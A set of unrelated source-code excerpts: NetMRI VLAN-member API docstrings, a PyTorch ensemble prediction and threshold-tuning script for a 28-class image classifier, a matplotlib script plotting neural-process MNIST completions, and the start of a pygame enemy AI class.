:param sort: The data field(s) to use for sorting the output. Default is VlanMemberID. Valid values are VlanMemberID, VlanMemberStartTime, VlanMemberEndTime, VlanMemberChangedCols, VlanMemberTimestamp, DataSourceID, DeviceID, VlanID, InterfaceID, BridgeMemberInd, VlanState, VlanType, VlanName, VTPDomain, RootBridgeAddress, BaseBridgeAddress, BaseNumPorts, StpDesignatedRoot, StpProtocolSpecification, StpPriority, StpTopChanges, StpRootCost, StpRootPort, StpMaxAge, StpHelloTime, StpHoldTime, StpForwardDelay, StpBridgeMaxAge, StpBridgeHelloTime, StpBridgeForwardDelay.
:type sort: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` asc
:param dir: The direction(s) in which to sort the data. Default is 'asc'. Valid values are 'asc' and 'desc'.
:type dir: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param select: The list of attributes to return for each VlanMember. Valid values are VlanMemberID, VlanMemberStartTime, VlanMemberEndTime, VlanMemberChangedCols, VlanMemberTimestamp, DataSourceID, DeviceID, VlanID, InterfaceID, BridgeMemberInd, VlanState, VlanType, VlanName, VTPDomain, RootBridgeAddress, BaseBridgeAddress, BaseNumPorts, StpDesignatedRoot, StpProtocolSpecification, StpPriority, StpTopChanges, StpRootCost, StpRootPort, StpMaxAge, StpHelloTime, StpHoldTime, StpForwardDelay, StpBridgeMaxAge, StpBridgeHelloTime, StpBridgeForwardDelay. If empty or omitted, all attributes will be returned.
:type select: Array
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_field: The field name for NIOS GOTO that is used for locating a row position of records.
:type goto_field: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_value: The value of goto_field for NIOS GOTO that is used for locating a row position of records.
:type goto_value: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param NetworkID: The network id to which results would be limited.
:type NetworkID: Integer
| ``api version min:`` 2.3
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
            :param xml_filter: A SetFilter XML structure to further refine the search. The SetFilter will be applied AFTER any search query or field values, but before any limit options. The limit and pagination will be enforced after the filter. Note that this kind of filter may be costly and inefficient if not combined with database-level filtering.
:type xml_filter: String
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return vlan_members: An array of the VlanMember objects that match the specified input criteria.
:rtype vlan_members: Array of VlanMember
"""
return self.api_list_request(self._get_method_fullname("find"), kwargs)
def data_source(self, **kwargs):
"""The NetMRI device that collected this record.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param VlanMemberID: The internal NetMRI identifier for this VLAN membership.
:type VlanMemberID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The NetMRI device that collected this record.
:rtype : DataSource
"""
return self.api_request(self._get_method_fullname("data_source"), kwargs)
def interface(self, **kwargs):
"""The switched virtual interface for this VLAN on this device.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param VlanMemberID: The internal NetMRI identifier for this VLAN membership.
:type VlanMemberID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The switched virtual interface for this VLAN on this device.
:rtype : Interface
"""
return self.api_request(self._get_method_fullname("interface"), kwargs)
def vlan(self, **kwargs):
"""The VLAN associated with this VLAN membership.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param VlanMemberID: The internal NetMRI identifier for this VLAN membership.
:type VlanMemberID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The VLAN associated with this VLAN membership.
:rtype : Vlan
"""
return self.api_request(self._get_method_fullname("vlan"), kwargs)
def infradevice(self, **kwargs):
"""The device associated with this VLAN membership.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param VlanMemberID: The internal NetMRI identifier for this VLAN membership.
:type VlanMemberID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The device associated with this VLAN membership.
:rtype : InfraDevice
"""
return self.api_request(self._get_method_fullname("infradevice"), kwargs)
def network_id(self, **kwargs):
"""The Network View ID assigned to the Vlan membership.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param VlanMemberID: The internal NetMRI identifier for this VLAN membership.
:type VlanMemberID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The Network View ID assigned to the Vlan membership.
:rtype : Integer
"""
return self.api_request(self._get_method_fullname("network_id"), kwargs)
def device(self, **kwargs):
"""The device associated with this VLAN membership.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param VlanMemberID: The internal NetMRI identifier for this VLAN membership.
:type VlanMemberID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The device associated with this VLAN membership.
:rtype : Device
"""
return self.api_request(self._get_method_fullname("device"), kwargs)
|
import argparse
import os
from collections import defaultdict
import numpy as np
import pandas as pd
import torch
import torch.optim as optim
import torchsummary
from torch.optim import lr_scheduler
from torch.utils.data import DataLoader
from torchvision import datasets, models, transforms
from tqdm import tqdm
from typing import List
import skimage.io
from sklearn.metrics import f1_score
import torch.nn as nn
import torch.nn.functional as F
import pretrainedmodels
import config
import matplotlib.pyplot as plt
import classification_dataset
from classification_dataset import ClassificationDataset,ClassificationDatasetTest
from logger import Logger
from config import NB_CATEGORIES
from experiments import MODELS
import yaml
# Class index -> share (percent) of training samples carrying that label,
# for the 28 classes 0..27. Consumed by fit_prob_th() to choose per-class
# probability thresholds whose predicted-positive rate on the test set
# roughly matches these training frequencies.
# NOTE(review): values look hand-copied from a training-set label count —
# confirm they match the current dataset split.
train_probs = {
    0: 41.47,
    1: 4.04,
    2: 11.65,
    3: 5.02,
    4: 5.98,
    5: 8.09,
    6: 3.24,
    7: 9.08,
    8: 0.17,
    9: 0.14,
    10: 0.09,
    11: 3.52,
    12: 2.21,
    13: 1.73,
    14: 3.43,
    15: 0.07,
    16: 1.71,
    17: 0.68,
    18: 2.90,
    19: 4.77,
    20: 0.55,
    21: 12.16,
    22: 2.58,
    23: 9.54,
    24: 1.04,
    25: 26.48,
    26: 1.06,
    27: 0.04,
}
def tta_images(img):
    """Return the 8 dihedral-group variants of an NCHW tensor for TTA.

    The variants, in order, are: identity, H-flip, W-flip, H+W-flip, and
    the same four applied to the H/W-transposed tensor.

    Args:
        img: 4-D tensor whose last two dimensions are spatial (H, W).

    Returns:
        List of 8 tensors (views/copies of ``img``), original first.
    """
    variants = []
    for base in (img, img.transpose(2, 3)):
        variants.append(base)
        variants.append(base.flip(2))
        variants.append(base.flip(3))
        variants.append(base.flip(2, 3))
    return variants
# Ad-hoc smoke check for tta_images(): uses a small asymmetric plane so
# all 8 dihedral variants print differently. Invoked manually, not by a
# test runner.
def test_tta_images():
    """Print the 8 TTA variants of a tiny asymmetric test image."""
    plane = np.array([[0, 0, 1],
                      [0, 0, 1],
                      [0, 1, 1]], dtype=np.uint8)
    # Wrap to NCHW shape (1, 1, 3, 3) so tta_images' axis-2/3 ops apply.
    img = np.array([[plane]])
    print(img.shape)
    for t in tta_images(torch.tensor(img)):
        print(t)
# test_tta_images()
def fit_prob_th(results, scale_small=1.0):
    """Pick one probability threshold per class so the predicted-positive
    rate on ``results`` roughly matches the training-set class frequencies
    in ``train_probs``.

    Args:
        results: (num_samples, num_classes) array of per-class sigmoid
            probabilities.
        scale_small: exponent applied to each training frequency; values
            below 1.0 boost the target rate of rare classes (1.0 keeps the
            raw frequencies).

    Returns:
        np.ndarray with one threshold per class, in class-index order.
    """
    thresholds = []
    num_samples = results.shape[0]
    for cat, train_pct in train_probs.items():
        train_prob = train_pct / 100.0
        # p**s grows toward 1 as s -> 0 for p < 1, so small exponents lift
        # rare classes; /0.5**s and /1.95 rescale to a usable target rate.
        target_prob = (train_prob ** scale_small) / (0.5 ** scale_small) / 1.95
        target_count = int(num_samples * target_prob)
        # BUGFIX: low clip is now 1, not 0. With target_count == 0 the old
        # code indexed sorted scores at [-0] == [0], i.e. the *smallest*
        # score, which made nearly every sample positive for that class.
        # Using 1 selects the largest score instead, matching the intent
        # of a near-zero target rate.
        target_count = int(np.clip(target_count, 1, num_samples - 1))
        # np.sort already returns a copy, so no explicit .copy() is needed.
        threshold = np.sort(results[:, cat])[-target_count]
        thresholds.append(threshold)
        print(f'{cat:02} {threshold:0.3f} {target_prob:0.3f} {target_count}')
    return np.array(thresholds)
def predict(submission_name):
    """Generate a submission CSV for the test set from an ensemble config.

    Reads ``../submissions/<submission_name>.yaml``, runs every listed
    model/fold checkpoint over the test dataset (optionally with 8-way
    TTA), averages the sigmoid outputs over models, folds and TTA
    variants, thresholds them, and writes the space-separated class
    predictions to ``../submissions/<submission_name>.csv``.

    Per-fold raw predictions are cached in ``../output/predict_cache`` so
    re-runs only recompute missing folds. Requires a CUDA device.

    Args:
        submission_name: Base name of the submission YAML/CSV files.
    """
    results = []
    dataset = ClassificationDatasetTest(transform=lambda x: torch.from_numpy(x))
    data_loader = DataLoader(
        dataset,
        num_workers=8,
        batch_size=4,
        drop_last=False)
    # BUGFIX: yaml.load() without an explicit Loader is deprecated and
    # rejected by PyYAML >= 6; safe_load suffices for this plain-data
    # config. The `with` block also closes the previously leaked handle.
    with open(f'../submissions/{submission_name}.yaml') as config_file:
        submission_config = yaml.safe_load(config_file)
    os.makedirs('../output/predict_cache', exist_ok=True)
    use_tta = submission_config.get('use_tta', False)
    for model_cfg in submission_config['models']:
        model_name = model_cfg['model']
        run = model_cfg.get('run', '')
        folds = model_cfg.get('folds', config.FOLDS)
        run_str = '' if run is None else f'_{run}'
        model_info = MODELS[model_name]
        print(model_name)
        for fold in folds:
            # Skip folds without a recorded checkpoint (fold_checkpoints
            # may be a short list or a dict with missing keys).
            try:
                checkpoint = model_cfg['fold_checkpoints'][fold]
            except (IndexError, KeyError):
                continue
            checkpoints_dir = f'../output/checkpoints/{model_name}{run_str}_{fold}'
            print(f'fold {fold} checkpoint {checkpoint}')
            suffix = '_tta' if use_tta else ''
            cache_fn = f'../output/predict_cache/{model_name}{run_str}_fold_{fold}_ch_{checkpoint:03}{suffix}.pt'
            try:
                fold_outputs = torch.load(cache_fn)
            except FileNotFoundError:
                model = model_info.factory(**model_info.args)
                state_dict = torch.load(f'{checkpoints_dir}/{checkpoint:03}.pt')
                # Checkpoints may store the state dict bare or wrapped.
                if 'model_state_dict' in state_dict:
                    state_dict = state_dict['model_state_dict']
                model.load_state_dict(state_dict)
                model = model.cuda()
                model.eval()
                with torch.set_grad_enabled(False):
                    fold_outputs = []
                    for iter_num, data in tqdm(enumerate(data_loader), total=len(data_loader)):
                        tta_predictions = []
                        images = tta_images(data['img']) if use_tta else [data['img']]
                        for img in images:
                            output = torch.sigmoid(model(img.cuda()))
                            tta_predictions.append(output.detach().cpu().numpy())
                        # -> (batch, tta, classes)
                        fold_outputs.append(np.stack(tta_predictions, axis=1))
                    fold_outputs = np.concatenate(fold_outputs, axis=0)
                    torch.save(fold_outputs, cache_fn)
            results.append(fold_outputs)  # dimensions: fold, id, tta, class_predictions
    results = np.array(results)
    print(results.shape)
    # Average over the model/fold axis (0) and the TTA axis (2) -> (id, class).
    results = np.mean(results, axis=(0, 2))
    if 'thresholds' in submission_config:
        if submission_config['thresholds'] == 'fix_prob':
            threshold = fit_prob_th(results, scale_small=submission_config['thresholds_scale'])
        else:
            threshold = np.array(submission_config['thresholds'])
    else:
        threshold = 0.5
    pred_list = []
    for line in results:
        predictions = np.nonzero(line > threshold)[0]
        pred_list.append(' '.join(str(i) for i in predictions))
    sample_df = dataset.data
    sample_df.Predicted = pred_list
    sample_df.to_csv(f'../submissions/{submission_name}.csv', header=True, index=False)
def print_perc_and_f1_from_prob(data, labels, thresholds_sub, threshold=0.375):
    """Print per-class positive rates and F1 scores under four schemes.

    For each class the report shows: the training-set frequency, the
    predicted-positive rate at 0.5 and at the submission threshold, and
    F1 at ``threshold``, at a fixed 0.5, at the ad-hoc ``f1/2 + 1e-3``
    threshold, and at the submission threshold. Macro averages are
    printed at the end.

    Args:
        data: (num_samples, num_classes) array of sigmoid probabilities.
        labels: matching binary ground-truth array.
        thresholds_sub: per-class thresholds used for the submission.
        threshold: the "main" decision threshold to report F1 for.
    """
    f1_hist = []
    f1_05_hist = []
    f1_opt_hist = []
    f1_sub_hist = []
    for key in range(config.NB_CATEGORIES):
        f1 = f1_score(labels[:, key], data[:, key] > threshold, average='binary')
        # BUGFIX: f1_05 and prob_05 previously reused `threshold`; their
        # names and the "0.5:" / "F1 0.5" report labels say they must use
        # a fixed 0.5 cut-off.
        f1_05 = f1_score(labels[:, key], data[:, key] > 0.5, average='binary')
        # Heuristic threshold derived from the class's own F1 — keep as-is.
        f1_opt = f1_score(labels[:, key], data[:, key] > f1/2+1e-3, average='binary')
        f1_sub = f1_score(labels[:, key], data[:, key] > thresholds_sub[key], average='binary')
        prob_sub = np.sum(data[:, key] > thresholds_sub[key]) * 100.0 / data.shape[0]
        prob_05 = np.sum(data[:, key] > 0.5) * 100.0 / data.shape[0]
        f1_hist.append(f1)
        f1_05_hist.append(f1_05)
        f1_opt_hist.append(f1_opt)
        f1_sub_hist.append(f1_sub)
        print(f'{key:3} train {train_probs[key]:02.2f} 0.5: {prob_05:02.2f} sub: {prob_sub:02.2f} '
              f'f1 th {threshold} {f1:0.2f} '
              f'f1 th {f1/2+1e-3:0.2f} {f1_opt:0.2f} '
              f'f1 sub th {thresholds_sub[key]} {f1_sub:0.2f}')
    print(f'F1 0.5 {np.mean(f1_05_hist):0.2} {threshold} {np.mean(f1_hist):0.2} th f1/2 {np.mean(f1_opt_hist):0.2} '
          f'th sub {np.mean(f1_sub_hist):0.2}')
def predict_oof(submission_name):
    """Compute (and cache) out-of-fold predictions for every model in a submission.

    Reads ../submissions/<submission_name>.yaml, runs each model's per-fold
    checkpoint on its validation fold, caches the raw sigmoid outputs and
    labels under ../output/predict_oof/, and prints per-class F1 diagnostics
    for each model and finally for the per-fold mean over all models.
    Requires a CUDA device.
    """
    results = defaultdict(list)
    # NOTE(review): yaml.load without an explicit Loader warns on PyYAML>=5.1
    # and raises on 6.0, and the file handle is never closed — consider
    # yaml.safe_load inside a `with` block.
    submission_config = yaml.load(open(f'../submissions/{submission_name}.yaml'))
    # make sure all models using the same folds split
    model_name = submission_config['models'][0]['model']
    model_info = MODELS[model_name]
    # one validation dataset/loader per fold, indexed by fold number
    datasets = [
        ClassificationDataset(
            fold=fold,
            is_training=False,
            transform=lambda x: torch.from_numpy(x),
            folds_split=model_info.folds_split
        )
        for fold in config.FOLDS
    ]
    data_loaders = [
        DataLoader(
            datasets[fold],
            num_workers=8,
            batch_size=16,
            drop_last=False)
        for fold in config.FOLDS
    ]
    os.makedirs('../output/predict_oof', exist_ok=True)
    all_fold_labels = {}
    for model_cfg in submission_config['models']:
        model_name = model_cfg['model']
        run = model_cfg.get('run', '')
        folds = model_cfg.get('folds', config.FOLDS)
        run_str = '' if run is None else f'_{run}'
        model_info = MODELS[model_name]
        print(model_name)
        for fold in folds:
            checkpoint = model_cfg['fold_checkpoints'][fold]
            checkpoints_dir = f'../output/checkpoints/{model_name}{run_str}_{fold}'
            print(f'fold {fold} checkpoint {checkpoint}')
            cache_fn = f'../output/predict_oof/{model_name}{run_str}_fold_{fold}_ch_{checkpoint:03}.pt'
            try:
                # reuse cached predictions from a previous run
                fold_outputs, fold_labels = torch.load(cache_fn)
            except FileNotFoundError:
                # cache miss: load the checkpoint and run inference on the fold
                model = model_info.factory(**model_info.args)
                state_dict = torch.load(f'{checkpoints_dir}/{checkpoint:03}.pt')
                if 'model_state_dict' in state_dict:
                    # checkpoint saved with optimizer state etc. — unwrap
                    state_dict = state_dict['model_state_dict']
                model.load_state_dict(state_dict)
                model = model.cuda()
                model.eval()
                with torch.set_grad_enabled(False):
                    fold_outputs = []
                    fold_labels = []
                    for iter_num, data in tqdm(enumerate(data_loaders[fold]), total=len(data_loaders[fold])):
                        img = data['img'].cuda()
                        labels = data['labels'].detach().cpu().numpy()
                        output = model(img)
                        # multi-label: independent sigmoid per class
                        output = torch.sigmoid(output)
                        fold_labels.append(labels)
                        fold_outputs.append(output.detach().cpu().numpy())
                    fold_labels = np.concatenate(fold_labels, axis=0)
                    fold_outputs = np.concatenate(fold_outputs, axis=0)
                    torch.save((fold_outputs, fold_labels), cache_fn)
            all_fold_labels[fold] = fold_labels
            print_perc_and_f1_from_prob(fold_outputs, fold_labels, thresholds_sub=submission_config['thresholds'])
            results[fold].append(fold_outputs)
    # diagnostics for the per-fold ensemble (mean over all models)
    for fold in results.keys():
        fold_results = np.mean(np.array(results[fold]), axis=0)
        print('fold', fold)
        print_perc_and_f1_from_prob(fold_results, all_fold_labels[fold], thresholds_sub=submission_config['thresholds'])
def find_threshold(data, cls, plot=None, plot_label=''):
    """Sweep a geometric grid of thresholds for one class and score each by F1.

    @param data: pair (probabilities, labels), each (n_samples, n_classes)
    @param cls: class index to evaluate
    @param plot: optional matplotlib axes; if given, the F1-vs-threshold
        curve is drawn on it with `plot_label`
    @return: (thresholds, f1_values) — parallel lists over the grid
    """
    probs = data[0][:, cls]
    gt = data[1][:, cls]
    # geometric grid from 1e-3 up to (but not including) 1, ratio 1.025
    grid = []
    th = 1e-3
    while th < 1:
        grid.append(th)
        th *= 1.025
    scores = [f1_score(gt, probs > t, average='binary') for t in grid]
    top_threshold = grid[np.argmax(scores)]
    print(f'cls {cls} th {top_threshold:.03} f1 {max(scores):.3}')
    if plot:
        plot.plot(grid, scores, label=plot_label)
    return grid, scores
def find_threshold_from_oof(submission_name):
    """Search per-class F1-optimal thresholds on cached out-of-fold predictions.

    Loads the submission config, reads the cached per-fold prediction files
    written by predict_oof(), averages each class's F1-vs-threshold curve
    over folds, prints the best threshold per class and the mean combined F1,
    and shows a 6x5 grid of the curves.

    Fixes vs. previous version: the config YAML was loaded twice (identical
    file), via yaml.load without a Loader (fails on PyYAML>=6) and with a
    leaked file handle — now loaded once with yaml.safe_load in a `with`.
    """
    results = defaultdict(list)
    with open(f'../submissions/{submission_name}.yaml') as cfg_file:
        submission_config = yaml.safe_load(cfg_file)
    # make sure all models using the same folds split
    model_name = submission_config['models'][0]['model']
    model_info = MODELS[model_name]
    # NOTE(review): datasets are built but only referenced by commented-out
    # code below — kept in case ClassificationDataset construction is relied on.
    datasets = [
        ClassificationDataset(
            fold=fold,
            is_training=False,
            transform=lambda x: torch.from_numpy(x),
            folds_split=model_info.folds_split
        )
        for fold in config.FOLDS
    ]
    for model_cfg in submission_config['models']:
        model_name = model_cfg['model']
        run = model_cfg.get('run', '')
        folds = model_cfg.get('folds', config.FOLDS)
        run_str = '' if run is None else f'_{run}'
        print(model_name)
        # NOTE(review): model_fold_outputs is re-created per model, so the
        # threshold search below only uses the last listed model's outputs —
        # confirm this is intentional.
        model_fold_outputs = []
        for fold in folds:
            checkpoint = model_cfg['fold_checkpoints'][fold]
            print(f'fold {fold} checkpoint {checkpoint}')
            cache_fn = f'../output/predict_oof/{model_name}{run_str}_fold_{fold}_ch_{checkpoint:03}.pt'
            fold_outputs = torch.load(cache_fn)
            results[fold].append(fold_outputs)
            model_fold_outputs.append(fold_outputs)
    all_combined_f1 = []
    fig, axx = plt.subplots(6, 5)
    for cls in range(config.NB_CATEGORIES):
        ax = axx[cls // 5, cls % 5]
        ax.set_title(str(cls))
        print()
        thresholds = []
        f1_values = []
        for fold in folds:
            fold_thresholds, fold_f1_values = find_threshold(
                model_fold_outputs[fold],
                cls=cls,
                plot=ax,
                plot_label=f'cls {cls} fold {fold}')
            thresholds.append(fold_thresholds)
            f1_values.append(fold_f1_values)
        # average the F1 curve over folds, then pick the argmax threshold
        thresholds = np.mean(np.array(thresholds), axis=0)
        f1_values = np.mean(np.array(f1_values), axis=0)
        top_threshold = thresholds[np.argmax(f1_values)]
        print(f'cls {cls} th {top_threshold:.03} f1 {max(f1_values):.3} combined')
        all_combined_f1.append(max(f1_values))
    print('F1 ', np.mean(all_combined_f1))
    plt.show()
def check(submission_name):
    """Sanity-check a submission CSV: per-class prediction rate vs. training rate.

    Accepts either a direct path to a .csv (with the .yaml config next to it)
    or a bare submission name resolved under ../submissions/. Prints, for
    every class that appears in the predictions, the predicted-positive
    percentage, the training-set frequency and the threshold used.

    Bug fix: the original passed the *filename string* to yaml.load in the
    direct-path branch, so the YAML config was never actually read; the
    config is now opened and parsed with yaml.safe_load (also avoiding the
    missing-Loader failure on PyYAML>=6 and the leaked file handle).
    """
    try:
        df = pd.read_csv(submission_name, dtype={'Id': str, 'Predicted': str}, na_values='')
        with open(submission_name[:-3] + 'yaml') as cfg_file:
            submission_config = yaml.safe_load(cfg_file)
    except FileNotFoundError:
        df = pd.read_csv(f'../submissions/{submission_name}.csv', dtype={'Id': str, 'Predicted': str}, na_values='')
        with open(f'../submissions/{submission_name}.yaml') as cfg_file:
            submission_config = yaml.safe_load(cfg_file)
    # count how many rows predict each class
    samples = defaultdict(int)
    for line in df.Predicted:
        line = str(line)
        if line == 'nan':  # empty prediction cell
            continue
        for item in line.split():
            samples[int(item)] += 1
    for key in sorted(samples.keys()):
        prob = samples[key] * 100.0 / len(df.Predicted)
        threshold = submission_config['thresholds'][key]
        print(f'{key:3} {prob:0.2f} {train_probs[key]:0.2f} {threshold}')
def main():
    """CLI entry point: run the requested action on the given submission."""
    parser = argparse.ArgumentParser()
    parser.add_argument('action', type=str, default='predict')
    parser.add_argument('--submission', type=str)
    args = parser.parse_args()

    submission = args.submission
    if args.action == 'predict':
        # predicting is immediately followed by a sanity check of the output
        predict(submission)
        check(submission)
    elif args.action == 'check':
        check(submission)
    elif args.action == 'predict_oof':
        predict_oof(submission)
    elif args.action == 'find_threshold_from_oof':
        find_threshold_from_oof(submission)


if __name__ == '__main__':
    main()
|
# Plot qualitative 2D-MNIST completions for several (A)(S)NP model variants:
# one row per timestep, columns = [context, target, one column per model].
import os, argparse, math
import pickle as pkl
import numpy as np
import matplotlib
from matplotlib import rc
import matplotlib.pyplot as plt
from scipy import misc  # NOTE(review): unused in this script; scipy.misc is deprecated
import tensorflow as tf  # NOTE(review): unused in this script

from utils import reordering

# NOTE(review): 'text.latex.unicode' was removed in matplotlib 3.0 — this line
# raises KeyError on modern matplotlib; confirm the pinned version.
matplotlib.rcParams['text.latex.unicode']=True
rc('font', **{'family': 'serif', 'serif': ['Computer Modern']})
rc('text', usetex=True)

img_name = '2d_mnist_app_'

##############################################
# mnist
#sample_idx=900000
#b_idx=0
#b_idx=1
#b_idx=2
sample_idx=801000  # training step of the pickled sample to visualize
b_idx=0            # which element of the batch to draw

img_name += str(sample_idx).zfill(7)+'_'+str(b_idx).zfill(2)+'.png'
prefix = '../logs_mnist_c/'
# one log directory per model variant (must stay aligned with `labels` below)
dirs = [
    #'07-25,10:24:11.220550', # NP(h=128)
    '07-25,10:24:15.632419', # ANP(h=128)
    '10-22,16:12:26.898386', # SNP(h=128)
    '12-28,08:07:05.227516', # SNP-Att(K=inf)
    '07-25,10:24:09.806928', # SNP-RMRA(h=128,K=25)
]
for i in range(len(dirs)):
    dirs[i] = prefix+dirs[i]
labels = [
    #'NP',
    'ANP',
    'SNP',
    #'SNP-W(K=25)',
    #'SNP-RMR(K=25)',
    #'ASNP-W(K=25)',
    #'ASNP-RMR(K=25)',
    'ASNP-W',
    'ASNP-RMR',
]

# get data
data = []
h_x_list = []
for idx, direc in enumerate(dirs):
    # each pickle holds, in order: pred, std, query, target, hyperparam
    with open(os.path.join(direc,'data'+str(sample_idx).zfill(7)+'.pickle'),
              'rb') as f:
        pred = pkl.load(f)
        std = pkl.load(f)
        query = pkl.load(f)
        target = pkl.load(f)
        hyperparam = pkl.load(f)
        #if idx == len(labels)-1:
        #    h_x_list.append(pkl.load(f))
    if idx == 0:
        # targets cover the full square canvas, so side = sqrt(#pixels)
        canvas_size = int(math.sqrt(len(target[0][0])))
    # [target_x, target_y, context_x, context_y, pred_y, std_y]
    # SNP-family predictions are ordered temporally; others are not
    if 'SNP' in labels[idx]:
        data.append(reordering(query, target, pred, std, temporal=True))
    else:
        data.append(reordering(query, target, pred, std, temporal=False))

# plotting
pqset_point = [1.0,0.0,0.0] # Red  (NOTE(review): unused below)
T = np.arange(0,50,5)  # timesteps to visualize (every 5th of 50)
plt.figure(figsize=(4.8*(2+len(labels)), 4.8*len(T))) # [context, target(withIm), models] * len(T)
for t_idx, t in enumerate(T):
    for i in range(len(labels)):
        target_x, target_y, context_x, context_y, pred_y, std = data[i]
        tar_canvas = np.ones((canvas_size,canvas_size,3))
        cont_canvas = np.ones((canvas_size,canvas_size,3))
        cont_canvas[:,:,:] = 1.0 # default color: white
        tar_y = target_y[t][b_idx] + 0.5
        # denormalize coordinates from [-1, 1] to pixel indices
        con_x = ((context_x[t][b_idx] + 1.0) / 2) * (canvas_size-1) + 0.5
        con_y = context_y[t][b_idx] + 0.5
        pred_canvas = np.ones((canvas_size,canvas_size,3))
        std_canvas = np.ones((canvas_size,canvas_size,3))
        im_canvas = np.ones((canvas_size,canvas_size,3))  # NOTE(review): unused
        # denormalization
        tar_x = ((target_x[t][b_idx] + 1.0) / 2) * (canvas_size-1) + 0.5
        pre_y = pred_y[t][b_idx] + 0.5
        std_y = std[t][b_idx] + 0.5
        # rasterize target / prediction / std intensities (dark = high value)
        for j in range(len(tar_x)):
            x_loc = int(tar_x[j][0])
            y_loc = int(tar_x[j][1])
            #if i == 0:
            tar_canvas[x_loc][y_loc] = 1-tar_y[j][0]
            pred_canvas[x_loc][y_loc] = np.clip(1-pre_y[j][0],0,1)
            std_canvas[x_loc][y_loc] = np.clip(1-std_y[j][0],0,1)
        if i == len(labels)-1:
            # context canvas only needs to be filled once per row
            for j in range(len(con_x)):
                x_loc = int(con_x[j][0])
                y_loc = int(con_x[j][1])
                if con_y[j][0]!=0:
                    cont_canvas[x_loc][y_loc] = 1-con_y[j][0]
                else:
                    # zero-valued context point drawn in blue
                    cont_canvas[x_loc][y_loc] = 0
                    cont_canvas[x_loc][y_loc][2] = 1
        # drawing target and context
        if i == len(labels)-1:
            plt.subplot(len(T),2+len(labels),t_idx*(2+len(labels))+1)
            plt.imshow(cont_canvas)
            plt.xticks([])
            plt.yticks([])
            if t_idx == 0:
                plt.title(r'Context',fontsize=40)
            plt.ylabel(r'$'+str(t+1)+'$',fontsize=50)
            plt.subplot(len(T),2+len(labels),t_idx*(2+len(labels))+2)
            plt.imshow(tar_canvas)
            plt.xticks([])
            plt.yticks([])
            if t_idx == 0:
                plt.title(r'Target',fontsize=40)
        # model prediction for this column
        plt.subplot(len(T),2+len(labels),t_idx*(2+len(labels))+i+3)
        plt.imshow(pred_canvas)
        plt.xticks([])
        plt.yticks([])
        if t_idx == 0:
            plt.title(r''+labels[i],fontsize=40)

##############################################
# saving
plt.subplots_adjust(wspace=0.1, hspace=0.1)
plt.savefig(img_name, bbox_inches='tight')
plt.close()
|
# repo: yumauri/kings_and_pigs
import pygame
from .sight_line import SightLine
from .states import Idle, Patrol
class Agent:
    """Enemy AI controller: tracks hero visibility with three sight lines and
    drives a small state machine (Idle or Patrol, chosen from the enemy type).
    """

    def __init__(self, width, height, enemy, hero):
        # width/height: size of the (debug) drawing layer in pixels
        self.view_width = width
        self.view_height = height
        self.enemy = enemy
        self.hero = hero
        # three rays aimed at the top, middle and bottom of the hero's hit box
        # (see check_hero_visibility)
        self.sights = [
            SightLine(width, height),
            SightLine(width, height),
            SightLine(width, height),
        ]
        self.seeing_hero = False
        # transparent overlay used only for debug drawing
        self.layer = pygame.Surface([width, height], pygame.SRCALPHA, 32)
        self.font = pygame.font.Font(None, 16)
        # initial state could be either Idle or Patrol
        self.state = Patrol(self) if "patrol" in self.enemy.type else Idle(self)

    def check_hero_visibility(self, chamber, offset_x, offset_y):
        """Update self.seeing_hero.

        True when the enemy faces the hero and at least one of the three
        sight lines reaches the hero without hitting a sprite from
        chamber.inactive_sprites. offset_x/offset_y translate world
        coordinates into screen coordinates.

        NOTE(review): when the hero is dead this returns False without
        resetting self.seeing_hero, so a stale True may persist — confirm.
        """
        if self.hero.lives <= 0:
            return False
        hero_hit_box = self.hero.get_hit_box()
        self_hit_box = self.enemy.get_hit_box()
        self.seeing_hero = True
        # if facing hero side - check collisions with walls and floors
        if (self.enemy.facing_right and self_hit_box.left <= hero_hit_box.left) or (
            not self.enemy.facing_right and self_hit_box.right >= hero_hit_box.right
        ):
            # ray to the top of the hero's hit box
            self.sights[0].update(
                True,
                (self_hit_box.centerx - offset_x, self_hit_box.y + 3 - offset_y),
                (hero_hit_box.centerx - offset_x, hero_hit_box.y - offset_y),
            )
            # ray to the middle of the hero's hit box
            self.sights[1].update(
                True,
                (self_hit_box.centerx - offset_x, self_hit_box.y + 3 - offset_y),
                (
                    hero_hit_box.centerx - offset_x,
                    hero_hit_box.y + (hero_hit_box.height - 3) // 2 - offset_y,
                ),
            )
            # ray to the bottom of the hero's hit box
            self.sights[2].update(
                True,
                (self_hit_box.centerx - offset_x, self_hit_box.y + 3 - offset_y),
                (hero_hit_box.centerx - offset_x, hero_hit_box.bottom - 3 - offset_y),
            )
            # check collisions
            open_view = [True for _ in self.sights]
            for block in chamber.inactive_sprites:
                for i, sight in enumerate(self.sights):
                    if open_view[i] and sight.collides_with(block, offset_x, offset_y):
                        open_view[i] = False
